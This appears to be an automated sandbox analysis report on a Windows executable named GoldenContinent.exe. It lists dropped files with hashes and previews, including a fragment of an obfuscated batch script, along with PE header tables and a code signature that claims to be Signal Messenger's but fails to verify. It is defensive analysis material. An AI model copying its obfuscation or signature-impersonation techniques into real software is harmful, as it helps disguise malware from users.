                                                                                                                                                                                                                                                                          Preview:Set Decreased=P..gHIntroduced-Hb-Featuring-Meets-Albums-..BSSegment-Duncan-..NebVHappy-Implement-Boundaries-Unsigned-Refer-Pal-Appreciate-Engagement-Exemption-..bBAffected-..XpvBoxed-Regulations-Males-Businesses-Unable-Speech-..xNAware-Aim-Compromise-..Set Israel=r..qGUrRegional-..lhzSeat-Motherboard-Otherwise-Wax-..RgADependence-Intervals-Fiber-Document-Over-Terrible-Experiments-Arrangements-Persistent-..yFHServices-Fighter-Party-Incurred-Advisors-Dts-..oiHGenetics-Possibly-Tissue-..WYyLimited-Oracle-Med-Download-October-Immediate-Complexity-Heating-Millions-..SgMVerde-Solo-..Set Slight=I..SdDUnnecessary-..WBRaising-Tickets-Lincoln-Recorded-Referenced-Incidents-Chairs-..AyHolland-..FegOHoldings-Corrected-Salary-Pounds-Crimes-Many-Numerical-Cattle-Demonstrate-..utGuests-..plplLady-Committed-Biggest-Burden-Psychology-Products-Pollution-Blvd-Beastality-..BNohEthical-Yeah-Andorra-Posted-Went-..ElVolume-Hiv-Allows-Pearl-Payment-Newark-Gonna-Tagged-B-..cjuILite-Sum-Leg-Asks-Linda-Perhaps-Ga
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1428), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):30129
                                                                                                                                                                                                                                                                          Entropy (8bit):5.0912603741502345
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:PyCCN7AUkSj4PAO0qvRm4sJtubk8l9wTNnUrKJLwioJhG:zFAOxvN0tw9l9wThUOJLwioJg
                                                                                                                                                                                                                                                                          MD5:AF14F57478CFDFECF403381BD9E816D0
                                                                                                                                                                                                                                                                          SHA1:652001844758EF461A0FAC5A1BA9097B0291D473
                                                                                                                                                                                                                                                                          SHA-256:F18F8E672DC1F8EBBEE1294CC79CEEA9C03C90E39101868CACFCC6B2648610BC
                                                                                                                                                                                                                                                                          SHA-512:B0879B3B25B2B75EA31438B1C9FECD2972D4F39E6B90CB8C3338EA395DB54F01D9DB7B4FB1B57FFD230A8F9A1562F057679DB2927CEE90BB8D6E0087B9DE7375
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Set Decreased=P..gHIntroduced-Hb-Featuring-Meets-Albums-..BSSegment-Duncan-..NebVHappy-Implement-Boundaries-Unsigned-Refer-Pal-Appreciate-Engagement-Exemption-..bBAffected-..XpvBoxed-Regulations-Males-Businesses-Unable-Speech-..xNAware-Aim-Compromise-..Set Israel=r..qGUrRegional-..lhzSeat-Motherboard-Otherwise-Wax-..RgADependence-Intervals-Fiber-Document-Over-Terrible-Experiments-Arrangements-Persistent-..yFHServices-Fighter-Party-Incurred-Advisors-Dts-..oiHGenetics-Possibly-Tissue-..WYyLimited-Oracle-Med-Download-October-Immediate-Complexity-Heating-Millions-..SgMVerde-Solo-..Set Slight=I..SdDUnnecessary-..WBRaising-Tickets-Lincoln-Recorded-Referenced-Incidents-Chairs-..AyHolland-..FegOHoldings-Corrected-Salary-Pounds-Crimes-Many-Numerical-Cattle-Demonstrate-..utGuests-..plplLady-Committed-Biggest-Burden-Psychology-Products-Pollution-Blvd-Beastality-..BNohEthical-Yeah-Andorra-Posted-Went-..ElVolume-Hiv-Allows-Pearl-Payment-Newark-Gonna-Tagged-B-..cjuILite-Sum-Leg-Asks-Linda-Perhaps-Ga
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61440
                                                                                                                                                                                                                                                                          Entropy (8bit):7.996521386092723
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:toQS4kBhUH0wmadkZgU3Q+q4uc7X3sZepMTXHTAC83Nd2cIH:OdhaLmaggUXq4fX7qXH3U2cIH
                                                                                                                                                                                                                                                                          MD5:B6DF230011AF1D7F8415B0B5969C2F4A
                                                                                                                                                                                                                                                                          SHA1:48ED82745E2FDEB446FCC0B81ADD5A4530EDDFD7
                                                                                                                                                                                                                                                                          SHA-256:141ACB51A175B6E2ACEC3455B4D7EAB19779E11DDA14A5D4E82A63C7A2F817C7
                                                                                                                                                                                                                                                                          SHA-512:5999389BCB4993A2A4E5745D6A5005345C58FCED90B9D93EB5FD3E71D6987E858B2F47BCAC1BA7876C93B06D1A5F4BE7C6FDC85F03264711E0C99D229317CFA8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):124928
                                                                                                                                                                                                                                                                          Entropy (8bit):6.005713786418481
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:W640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPo:t4V14ZgP0JaAOz04phdyA
                                                                                                                                                                                                                                                                          MD5:7CDF29F1AD43ED80FD3BF9F2BCF8E448
                                                                                                                                                                                                                                                                          SHA1:BC126782FC727C0EFD0CA2F03ED7106ADE3D4FA9
                                                                                                                                                                                                                                                                          SHA-256:6753E389E6C641FFC5F06EE46B9DD7D65201A77BC687E5F584B26EA56FBF5748
                                                                                                                                                                                                                                                                          SHA-512:47ED86EAAADB8A121653A2C8415B6099F8AC88B588065674AFA3BAC96EEE6C70C026FC1C74AA4A014BF539A8E243F7EB5CAD94226926FBB3A5D5BE5E46BC72BF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):105472
                                                                                                                                                                                                                                                                          Entropy (8bit):6.723955878673787
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:ReOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1Cwt:ReOyKODOSpQSAU4CE0Imbi806
                                                                                                                                                                                                                                                                          MD5:093E44E1DAAA29E32F2711283167AD8B
                                                                                                                                                                                                                                                                          SHA1:3BE29AAD7A16048F09D3A190EECB2567BE10C838
                                                                                                                                                                                                                                                                          SHA-256:E6C6CC8B34F76878305C6BDB16DCD61A99EFDD1B3BCD25BFAAF5C6F585D79843
                                                                                                                                                                                                                                                                          SHA-512:4F642E0ACA001D1BE656408C20E6F00F00C59F5B966B4894DC01793DCB0EDE0CD38099C990420D7238F14A0202C1A8213136D740FB22A74688CFCF379BFC6385
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):145408
                                                                                                                                                                                                                                                                          Entropy (8bit):6.6245809119795265
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:yPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypI8:yPj0nEo3tb2j6AUkB0CThp6vmVnU
                                                                                                                                                                                                                                                                          MD5:6CC42A5BCA76F09BF28289009427AFF5
                                                                                                                                                                                                                                                                          SHA1:9B4B6DD644CF82B80A025B4DEDABD8406F9B3B31
                                                                                                                                                                                                                                                                          SHA-256:CACABEB6D49CA732CF5532FF4918EEA4DADF67DEC277C42D37BBA32BBF2986E3
                                                                                                                                                                                                                                                                          SHA-512:846BF07F4F0ED2563C8A2EF96FA9EFD493ED54D07D49A36D0BA1EBEE16865346BF8AB3C819FF86A3C27DB023037515CF5374BDDF7FB80636390DD1BAD3495534
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):117760
                                                                                                                                                                                                                                                                          Entropy (8bit):6.41749450367767
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:DdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+3m:JgQaE/loUDtf0accB3gBm2
                                                                                                                                                                                                                                                                          MD5:BFCC32C058927FD6F1DC7D49432245B6
                                                                                                                                                                                                                                                                          SHA1:37FD77F925A236217709A62634FB91507C1CE1AD
                                                                                                                                                                                                                                                                          SHA-256:92D6B2C91AE61AD4EB755F32DAB99833F2C0D46BC43144DFA78F79FDE79814B6
                                                                                                                                                                                                                                                                          SHA-512:D24883BB0A214E8E8713A0F08A3E95A80BF3A30AB67B81BCED538F810AAD24A04FD3F858FDC1CD0099770E326B7274A28C0D7AAADB07245B4D3E343A97AF1466
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):78848
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997677582381979
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:caO1cfSGzPlYz5XiSpYBe5IAtY7yKTAZaNMJr7Gq7nuYyVt:FOaJzPlYtSSpGeKf+9ZLJrViYyVt
                                                                                                                                                                                                                                                                          MD5:A41ADC03A819C861EB3371C8DF26FE8B
                                                                                                                                                                                                                                                                          SHA1:188DD98EBB43308A18B8CC7946B6117EEE295B38
                                                                                                                                                                                                                                                                          SHA-256:166243C65693A04D65270F05C6D3636EA99CC84B47B479714C18D5B5BFB22CBB
                                                                                                                                                                                                                                                                          SHA-512:2F8CEC765DE46A607283E4F9DA77AA1D9F59FE8840013A69FD9007457ECDA48447DB06A01A9084C53E8C185501F6FA54C4CD80148002A3D4F8394A374D7B0DD4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (6186)
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):6192
                                                                                                                                                                                                                                                                          Entropy (8bit):5.809020948542197
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:LsM3XN6666VACcpb7ybvg4N79Fd66666rJ3FBzlDMDBAQ9Z:LsM3966662Vybvg4T66666lVBed1z
                                                                                                                                                                                                                                                                          MD5:29BA7AE7C03ED725C47722C5DA382E55
                                                                                                                                                                                                                                                                          SHA1:6CE2A589BE22983FA3966CF152243A5C38355867
                                                                                                                                                                                                                                                                          SHA-256:75AD7C4A8C73E5F1DC14AB472CACCE5F1C09C8D906F8ED3A3A1238317786BED8
                                                                                                                                                                                                                                                                          SHA-512:16BB17527FFE0D72DC984CC1EA7292FAEF12A50582D51E80B9EBAEEF38311E2D1D444D14A599A5B977DD68965370798A222A16AFEF7DD3323A1D1DF82C8C26B8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                          Preview:)]}'.["",["military helicopter crash camp pendleton","daniel user","homestead movie angel studios","ripple xrp price prediction","nintendo switch 2 specs","sergio p.rez","solo leveling season 2 trailer","chinese satellite explosion"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):132739
                                                                                                                                                                                                                                                                          Entropy (8bit):5.436896434938398
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:fokJQ7O4N5dTm+syHEt4W3XdQ4Q6OuSr/nUW2i6o:fdQ7HTt/sHdQ4Q6ODfUW8o
                                                                                                                                                                                                                                                                          MD5:989461679C218C7FCFE622EC2F64F69F
                                                                                                                                                                                                                                                                          SHA1:5760375102A5643686D8A7EBFA2C9BB612E031F2
                                                                                                                                                                                                                                                                          SHA-256:2D0280A24EA40C8A808302B4FD4F9D7F1178A85569E74F35B68BA262B6A35FEE
                                                                                                                                                                                                                                                                          SHA-512:707D882F5F13AE58A0497ECEB6240381FC9B65DE9785E382BE13D54CA52A4F183489A89A2DD4C2BF0680B3E9FD6CEE31D3FB0F744484177A077DC167B65B2CF8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):5162
                                                                                                                                                                                                                                                                          Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                          MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                          SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                          SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                          SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Entropy (8bit):7.978519034566694
                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                          File name:GoldenContinent.exe
                                                                                                                                                                                                                                                                          File size:1'122'075 bytes
                                                                                                                                                                                                                                                                          MD5:7bc8c8c16081e8d9cebcce0d93bc5f8d
                                                                                                                                                                                                                                                                          SHA1:948d3349e7fc284fe648098d85ba7341258847f3
                                                                                                                                                                                                                                                                          SHA256:f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78
                                                                                                                                                                                                                                                                          SHA512:2a5fc41f2d958cb52466808ee664cef9f559c972bf029424a3936e1391c94213f38d18779297473cdd09bf90f83d5fa53ed05a8fca3e3b5e56e3d8cfe3608379
                                                                                                                                                                                                                                                                          SSDEEP:24576:znylYik3Jygua29LaP9r4ASTVSpe/E+oo+9c1K:7ylYi4wguaguVLyoEN+9c1K
                                                                                                                                                                                                                                                                          TLSH:EE3523D26F1AC82FC9D18A7119F4EA835D7CF4204875D83BB362C98C35A0389E7657A7
                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...D...B...8.....
                                                                                                                                                                                                                                                                          Icon Hash:1e3333421185db07
                                                                                                                                                                                                                                                                          Entrypoint:0x4038af
                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                          Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                          Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                                                          Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                                                          • 11/09/2024 20:33:41 12/09/2027 20:33:41
                                                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                                                          • CN="Signal Messenger, LLC", O="Signal Messenger, LLC", L=Mountain View, S=California, C=US, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=6703101, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                                                          Thumbprint MD5:D4E75D16F15BD3BC32ACDF4EAF83A59A
                                                                                                                                                                                                                                                                          Thumbprint SHA-1:8A5A56EFFDC462AE8A6CF732BB21E2541995BF36
                                                                                                                                                                                                                                                                          Thumbprint SHA-256:44DBAC9846A7E8F8EAE8BF0F9518B44FB86C257DD797742B767AF6ED1995AAF4
                                                                                                                                                                                                                                                                          Serial:4EF1C2D67B37517957F42E8D
                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                          sub esp, 000002D4h
                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                          mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                          call dword ptr [00409030h]
                                                                                                                                                                                                                                                                          push 00008001h
                                                                                                                                                                                                                                                                          call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                          call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                          push 00000008h
                                                                                                                                                                                                                                                                          mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                          call 00007FF2BC81747Bh
                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                          push 000002B4h
                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                          • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                          • [LNK] VS2010 SP1 build 40219

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x3d25e | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x10edab | 0x3170 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x100000 | 0x3d25e | 0x3d400 | 69cb5ea72e0dfab6478f194ea4ee8b1c | False | 0.9886280293367347 | data | 7.96093609626921 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x13e000 | 0xfd6 | 0x1000 | 9fe5fe5341a235c5cc875614b6fed086 | False | 0.59814453125 | data | 5.582792212884209 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x1001f0 | 0x3ae44 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9953071884586684 |
| RT_ICON | 0x13b034 | 0x1840 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0017719072164948 |
| RT_ICON | 0x13c874 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6037234042553191 |
| RT_DIALOG | 0x13ccdc | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x13cddc | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x13cef8 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x13cf58 | 0x30 | data | English | United States | 0.875 |
| RT_MANIFEST | 0x13cf88 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |

| DLL | Import |
|---|---|
